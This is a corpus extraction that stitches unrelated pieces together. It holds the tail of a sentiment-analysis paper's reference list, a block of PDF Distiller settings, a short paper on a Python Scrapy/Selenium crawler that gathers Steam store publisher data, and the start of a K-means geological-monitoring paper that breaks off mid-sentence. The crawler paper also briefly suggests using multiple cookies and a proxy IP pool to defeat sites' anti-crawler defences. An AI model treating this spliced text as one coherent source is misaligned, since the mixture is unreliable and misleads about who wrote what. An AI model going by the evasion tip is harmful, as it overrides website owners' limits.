http://dx.doi.org/10.22266/ijies2019.1031.19 http://dx.doi.org/10.7717/peerj-cs.347 https://peerj.com/computer-science/ Kang Y, Zhou L. 2017. RubE: rule-based methods for extracting product features from online consumer reviews. Information & Management 54(2):166–176 DOI 10.1016/j.im.2016.05.007. Kim K. 2018. An improved semi-supervised dimensionality reduction using feature weighting: application to sentiment analysis. Expert Systems with Applications 109:49–65 DOI 10.1016/j.eswa.2018.05.023. Kiritchenko S, Zhu X, Cherry C, Mohammad S. 2014. NRC-Canada-2014: detecting aspects and sentiment in customer reviews. In: Proceedings of the 8th International Workshop on Semantic Evaluation (SemEval 2014). Dublin, 437–442. Kumar R, Pannu HS, Malhi AK. 2020. Aspect-based sentiment analysis using deep networks and stochastic optimization. Neural Computing and Applications 32(8):3221–3235 DOI 10.1007/s00521-019-04105-z. Labani M, Moradi P, Ahmadizar F, Jalili M. 2018. A novel multivariate filter method for feature selection in text classification problems. Engineering Applications of Artificial Intelligence 70:25–37 DOI 10.1016/j.engappai.2017.12.014. Liu H, Zhou MC, Lu XS, Yao C. 2018. Weighted Gini index feature selection method for imbalanced data. In: 2018 IEEE 15th International Conference on Networking, Sensing and Control. Piscataway: IEEE, 1–6. Ma Y, Peng H, Cambria E. 2018. Targeted aspect-based sentiment analysis via embedding commonsense knowledge into an attentive LSTM. In: Thirty-Second AAAI Conference on Artificial Intelligence. 5876–5883. Manek AS, Shenoy PD, Mohan MC, Venugopal KR. 2017. Aspect term extraction for sentiment analysis in large movie reviews using Gini index feature selection method and SVM classifier. World Wide Web 20(2):135–154 DOI 10.1007/s11280-015-0381-x. Panchendrarajan R, Ahamed N, Sivakumar P, Murugaiah B, Ranathunga S, Pemasiri A. 2017. Eatery: a multi-aspect restaurant rating system. In: Proceedings of the 28th ACM Conference on Hypertext and Social Media. New York: ACM, 225–234. Pontiki M, Galanis D, Papageorgiou H, Androutsopoulos I, Manandhar S, Al-Smadi M, Al-Ayyoub M, Zhao Y, Qin B, De Clercq O, Hoste V, Apidianaki M, Tannier X, Loukachevitch N, Kotelnikov E, Bel N, Jiménez-Zafra SM, Eryiğit G. 2016. Semeval-2016 task 5: aspect based sentiment analysis. In: 10th International Workshop on Semantic Evaluation. Poria S, Cambria E, Ku LW, Gui C, Gelbukh A. 2014. A rule-based approach to aspect extraction from product reviews. In: Proceedings of the Second Workshop on Natural Language Processing for Social Media. 28–37. Rachel JL. 2018. UCI ML drug review dataset. Available at https://www.kaggle.com/jessicali9530/ kuc-hackathon-winter-2018. Rana TA, Cheah YN. 2017a. A two-fold rule-based model for aspect extraction. Expert Systems with Applications 89:273–285 DOI 10.1016/j.eswa.2017.07.047. Rana TA, Cheah YN. 2017b. Improving aspect extraction using aspect frequency and semantic similarity-based approach for aspect-based sentiment analysis. In: International Conference on Computing and Information Technology. Cham: Springer, 317–326. Rana TA, Cheah YN. 2019. Sequential patterns rule-based approach for opinion target extraction from customer reviews. Journal of Information Science 45(5):643–655 DOI 10.1177/0165551518808195. Ruskanda FZ, Widyantoro DH, Purwarianti A. 2018. Comparative study on language rule based methods for aspect extraction in sentiment analysis. In: 2018 International Conference on Asian Language Processing. Piscataway: IEEE, 56–61. Bhamare and Prabhu (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.347 21/22 http://dx.doi.org/10.1016/j.im.2016.05.007 http://dx.doi.org/10.1016/j.eswa.2018.05.023 http://dx.doi.org/10.1007/s00521-019-04105-z http://dx.doi.org/10.1016/j.engappai.2017.12.014 http://dx.doi.org/10.1007/s11280-015-0381-x https://www.kaggle.com/jessicali9530/kuc-hackathon-winter-2018 https://www.kaggle.com/jessicali9530/kuc-hackathon-winter-2018 http://dx.doi.org/10.1016/j.eswa.2017.07.047 http://dx.doi.org/10.1177/0165551518808195 http://dx.doi.org/10.7717/peerj-cs.347 https://peerj.com/computer-science/ Schouten K, Frasincar F. 2018. Ontology-driven sentiment analysis of product and service aspects. In: European Semantic Web Conference. Cham: Springer, 608–623. Schouten K, Frasincar F, de Jong F. 2017. Ontology-enhanced aspect-based sentiment analysis. In: International Conference on Web Engineering. Cham: Springer, 302–320. Schouten K, Van Der Weijde O, Frasincar F, Dekker R. 2017. Supervised and unsupervised aspect category detection for sentiment analysis with co-occurrence data. IEEE Transactions on Cybernetic 48(4):1263–1275 DOI 10.1109/TCYB.2017.2688801. Shafie AS, Sharef NM, Murad MAA, Azman A. 2018. Aspect extraction performance with pos tag pattern of dependency relation in aspect-based sentiment analysis. In: 2018 Fourth International Conference on Information Retrieval and Knowledge Management (CAMP). Piscataway: IEEE, 1–6. Uysal AK. 2016. An improved global feature selection scheme for text classification. Expert Systems with Applications 43:82–92 DOI 10.1016/j.eswa.2015.08.050. Vanaja S, Belwal M. 2018. Aspect-level sentiment analysis on e-commerce data. In: International Conference on Inventive Research in Computing Applications. Coimbatore: IEEE, 1275–1279. Xu Q, Zhu L, Dai T, Guo L, Cao S. 2019. Non-negative matrix factorization for implicit aspect identification. Journal of Ambient Intelligence and Humanized Computing 11(7):2683–2699 DOI 10.1007/s12652-019-01328-9. Zeng D, Dai Y, Li F, Wang J, Sangaiah AK. 2019. Aspect based sentiment analysis by a linguistically regularized CNN with gated mechanism. Journal of Intelligent & Fuzzy Systems 36(5):3971–3980 DOI 10.3233/JIFS-169958. Bhamare and Prabhu (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.347 22/22 http://dx.doi.org/10.1109/TCYB.2017.2688801 http://dx.doi.org/10.1016/j.eswa.2015.08.050 http://dx.doi.org/10.1007/s12652-019-01328-9 http://dx.doi.org/10.3233/JIFS-169958 http://dx.doi.org/10.7717/peerj-cs.347 https://peerj.com/computer-science/ A supervised scheme for aspect extraction in sentiment analysis using the hybrid feature set of word dependency relations and lemmas ... Introduction Proposed method Results and discussion Conclusions References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_fyoz3tp6bnhfbhpmqnis5i46c4 ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 DOI: 10.21307/ijanmc-2020-018 64 Application Research of Crawler and Data Analysis Based on Python Wu Hejing East University of Heilongjiang Heilongjiang, 150086 E-mail: 499917928@qq.com, Liu Fang East University of Heilongjiang Heilongjiang, 150086） Zhao Long East University of Heilongjiang Heilongjiang, 150086 Shao Yabin East University of Heilongjiang Heilongjiang, 150086 Cui Ran East University of Heilongjiang Heilongjiang, 150086 Abstract—Combined with the actual situation, this paper explores how to develop a crawler method based on the specific framework for the complete interface of steam manufacturers and stores, which should be able to automatically and efficiently crawl the data of specific targets, analyze the dynamic pages, and complete the data cleaning, downloading, saving and other operations, explore the methods of general data analysis, and Analyze the downloaded data, extract useful information from it, analyze and summarize the specific crawler method and data analysis method through practical application. Keywords-Python; Scrapy; Selenium; BeautifulSoup I. INTRODUCTION The 21st century is a book written by information. With the rapid development of information technology, today's society has become a huge information polymer, and there are various kinds of data in this huge polymer. Data is a kind of embodiment of information. In this era of information explosion, how to efficiently find the data we want from all kinds of miscellaneous data and extract them from the network in batches has become a key problem. However, sometimes the unprocessed data itself may be confusing for people. How to process the huge and complex data obtained through what kind of technical means, and finally become an intuitive number, or trend, and become the information that people can obtain intuitively is also a very important topic to be studied in this data age. II. STATISTICAL INVESTIGATION ON THE PREFERENCE SALES VOLUME In this project, the American Steam online game platform mall is selected as the research object of the crawler. By setting a specific game company as a search keyword in steam's online mall, the data of all works of the company in steam mall are crawled, and the useful information is extracted by analyzing the basic data of each manufacturer's preference for game production type, series sales volume, and praise In addition, the game manufacturers are comprehensively scored and evaluated. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 65 III. RELEVANT TECHNOLOGY AND FRAMEWORK This project will use the scrapy framework based on Python language to crawl steam website. Python as a language has the advantages of lightweight, simplicity, wide range of application and so on. At present, various crawler frameworks and application libraries based on Python have been very mature, among which the crawler framework is very popular in the application of general web crawlers. Its first version was released in 2008, and now it is quite mature as a crawler framework. The basicprinciple of the scrapy framework is shown in Figure 1. Figure 1. Basic principles of Scrapy frame IV. DESIGN OF CRAWLER A. General design idea The process of crawler itself is actually to simulate the user's operation on the browser with a program. First of all, the starting point and range of crawling need to be specified. As the target of crawling is for manufacturers and their works, the interface of manufacturers is taken as the starting point. For example, the page of paradox, a manufacturer, first analyzes the entire manufacturer's page, and finds that the page links and information of all games or game related DLC downloads of the manufacturer are stored in the recommendation div framework of each sub recommendation of recommendations rows, as shown in Figure 2 B. Design and implementation of reptile functions The crawler architecture is composed of items, spiders, piplings and middleware. Among them, items are mainly used to define the items to be crawled, spiders are responsible for defining the whole process of crawling, what means to crawl, pipes are responsible for the basic operations such as data cleaning and saving, middleware can be responsible for the bridge service of scratch and other plug-ins or architectures. Responses Requests Scheduler Spiders Item Pipeline Downloader Internet ScrapyEngine Spider middlewares Downloader middlewares Item International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 66 Figure 2. Investigation of HTML page structure of steam manufacturers by using viewers First, the items to be crawled are defined in the items file. Finally, these items may be submitted to the analysis part for data analysis. The specific design and implementation code is: import scrapy class SteamDevItem(scrapy.Item): # define the fields for your item here like: # name = scrapy.Field() qry_nam = scrapy.Field() if_dev = scrapy.Field() pub_sum = scrapy.Field() pub_gam_sum = scrapy.Field() pub_dlc_sum = scrapy.Field() dev_nam = scrapy.Field() pub_nam = scrapy.Field() gam_title = scrapy.Field() res_date = scrapy.Field() gam_type = scrapy.Field() gam_tag = scrapy.Field() if_muti = scrapy.Field() gam_score = scrapy.Field() gam_score_sum = scrapy.Field() gam_score_ratio = scrapy.Field() pass C. Spider design The design of spider is the key point of this project. Whether the initial dynamic page connection or the last static page information crawling mode will be defined International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 67 in this file. In this project, spider will be named steam, and some key implementation codes will be pasted here, with running results and some notes attached. First, introduce start_ the design method of dynamic page crawling of selenium in requests method: chrome_opt = webdriver.ChromeOptions() prefs = { "profile.managed_default_content_settings.images": 2, 'permissions.default.stylesheet': 2 } chrome_opt.add_experimental_option("prefs", prefs) browser = webdriver.Chrome(options=chrome_opt) browser.get("https://store.steampowered.com/" + Qry_sta + "/" + Qry_Target) bs = BeautifulSoup(browser.page_source, 'html.parser') #Beautiful Soup The specific store connections of each product exist in the a anchor label of each entry, and these connections are read to the defined links using the loop_ In the list list, crawling of the list is completed, but sometimes the text and picture in the entry may contain a tag, and they all point to the same page. If direct application may cause repeated crawling, a loop is used here, and if not in statement is used to de duplicate the list. After using the print statement to verify the function of the module, the verification results are shown in Figure 3. Figure 3. List of URLs obtained by selenium and beautiful soup International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 68 D. Start directional climbing After designing and debugging the spider, run the CMD command window of the system, open the root directory of the crawler file, and input the crawler stream-o SteamDev.csv , crawl the target website. Input - O SteamDev.csv The purpose is to let the crawler save the last crawled data in the form of CSV table. The saved data appears in the project root. See Figure 4 for the climbing process. Figure 4. Executing the start request method selenium pop-up browser to crawl the dynamic page V. DATA ANALYSIS Next, we will perform basic visual operations on the crawled data in the form of operation tables. In the crawler project, we crawled for the Paradox Interactive publisher. The crawled data is presented in the form of CSV tables, as shown in Figure 5. Through the use of spreadsheets and further collation of the crawled data, the following data are obtained: the publisher has published 396 works in steam platform, of which the majority of DLC has published 334 DLC, most of the games published are single player games, and each game published in its mall has an average of 6800 reviews, of which the proportion of favorable reviews is about 76.4 8%, see the chart below for detailed visual analysis. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 69 Figure 5. Crawled data list Figure 6. Output the publisher platform follower ranking chart International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 70 VI. CONCLUSION Through demonstration and part of practice, this paper explores the process of data crawling and basic data analysis of dynamic pages by combining the general Python's story framework with selenium + beautiful soup through crawling the steam online game mall website. The crawler has good scalability. For example, if you want to compare the crawling data of multiple game manufacturers, you can write a query manufacturer list to get the product URL list from the dynamic web page of the manufacturer list first. In terms of anti-crawler, selenium itself has a very good anti crawler ability. If you want to further anti crawler, you can also expand multiple cookies, and even establish a proxy IP pool. ACKNOWLEDGMENT This paper is about the scientific research project of Heilongjiang Oriental University in 2019, "Implementation of Crawler Based on Python Scrapy Framework", project number HDFKY190109 REFERENCE [1] Yuhao Fan. Design and implementation of distributed crawler system based on scrapy[J].IOP Conference Series: Earth and Environmental Science,2018,108(4):2-8. [2] Jing Wang, Yuchun Guo. Scrapy-based crawling and user-behavior characteristics analysis on taobao[P]. Cyber-Enabled Distributed Computing and Knowledge Discovery (CyberC), 2012 International Conference on, 20120:1-5. [3] Ryan Mitchell. Python web crawler authority Guide (Second Edition) [M]. Beijing: People's post and Telecommunications Press, 2019:57-70. [4] Wei Chengcheng. Data information crawler technology based on Python [J]. Electronic world, 2018 (11): 208-209. [5] Mark.Lutz . Python learning manual (Fifth Edition, Volume I) [M]. Beijing: Mechanical Industry Press, 2019:1-2. [6] Fan Chuanhui. Python reptile development and project practice [M]. Beijing: Mechanical Industry Press, 2017 (3): 69-72. [7] Song Yongsheng, Huang Rongmei, Wang Jun. research on Python based data analysis and visualization platform [J]. Modern information technology: 2019 (21): 1-4. [8] Liu Yuke, Wang Ping. Statistics and graph output of student achievement data based on Python + pandas + Matplotlib [J]. Fujian computer. 2017 (11): 2-6. [9] Liu Yuke, Wang Ping. Statistics and graph output of student achievement data based on Python + pandas + Matplotlib [J]. Fujian computer. 2017 (11): 2-6. [10] Long Hu, Yang Hui. Data analysis and visualization in the context of big data [J]. Journal of Kaili University. 2016 (03): 1-3. work_fzksxbt7cfbrlliqou7wypqebm ---- IET Submission Template International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 DOI: 10.21307/ijanmc-2019-002 16 Application of K-means Algorithm in Geological Disaster Monitoring System Wang Jianguo College of Computer Science and Engineering Xi’an Technological University No.2 Middle Xuefu Road, Weiyang District, Xi’an, 710021, China e-mail: wjg_xit@126.com, Xue Linyao * College of Computer Science and Engineering Xi’an Technological University No.2 Middle Xuefu Road, Weiyang District, Xi’an, 710021, China e-mail: 1525610807@qq.com Abstract—The K-means algorithm is considered to be the most important unsupervised machine learning method in clustering, which can divide all the data into k subclasses that are very different from each other. As K-means algorithm is simple and efficient, it is applied to data mining, knowledge discovery and other fields. This paper proposes CMU-kmeans algorithm with improved UPGMA algorithm and Canopy algorithm. The experimental results is that the algorithm can not only get the number k of the initial clustering center adaptable, but also avoid the influence of the noise data and the edge data. Also, the improved algorithm can void the initial effect of the random selection on the clustering, which reflects the actual distribution in the dataset. Keywords-Clustering Analysis; CMU-kmeans Algorithm; Geological Disaster Monitoring Data I. INTRODUCTION The occurrence of geological disasters caused great casualties to humans, the main reasons include landslides and debris flow and rainfall and so on. And these geological disasters always cause many local public facilities to be damaged by large and small, and brought great damage to the people and their property. Also, there are still many such cases in China. Faced with such a severe threat of geological disasters, the state and the government on the prevention and control of geological disasters into a lot of human and material resources, and achieved remarkable results. With the progress of technology and high development of information technology, many new detection equipments have been put into the geological disaster real-time detection, such as GPS, secondary sound wave monitoring, radar and so on. With the development of geological hazard detection technology, the amount of the monitoring data grew by leaps and bounds, data types are becoming more and more complex as well. K-means algorithm is a clustering algorithm based on the classification of the classic algorithm, the algorithm in the industrial and commercial applications more widely. As we all know, it both has many advantages and many disadvantages. In this paper, we mainly study the optimization of the initial clustering center and the avoidance of the blindness of the k-value selection, and propose the CMU-kmeans algorithm. The data source of the study is the historical data detected by the geological disaster monitoring system, and 2000 records are randomly selected from the rainfall data of different areas in Shaanxi Province as the research object, which are served as a representative sample of the improved K-means clustering algorithm. The experimental results show that the improved algorithm not only eliminates the sensitivity to the initial input and improve the stability and effectiveness of the algorithm, but also can intelligently determine the initial clustering center number k, which improves the simplicity and operability of the algorithm. A. Overview of K-means algorithm The K-means algorithm is a classical unsupervised clustering algorithm. The purpose is to divide a given dataset containing N objects into K clusters so that the objects in the cluster are as similar as possible, and the objects between clusters are as similar as possible. Set the sample set X = {x1, x2, x3, ..., xn}, n is the number of samples. The idea of the K-means algorithm is that the k data objects are randomly selected from the sample set X as the initial clustering center, and then the data is allocated to the most similar cluster according to the similarity degree of each data object and k clustering centers; Recalculate the average of each new cluster and regard it as the next clustering center and repeat the process until the updated cluster center is consistent with the update, that is, the criterion function E converges. The goal is to make the object similarity in the cluster the largest, and the similarity between the objects is the smallest. The degree of similarity between the data can be determined by calculating the Euclidean distance between the data. For the n-dimensional real vector space, the 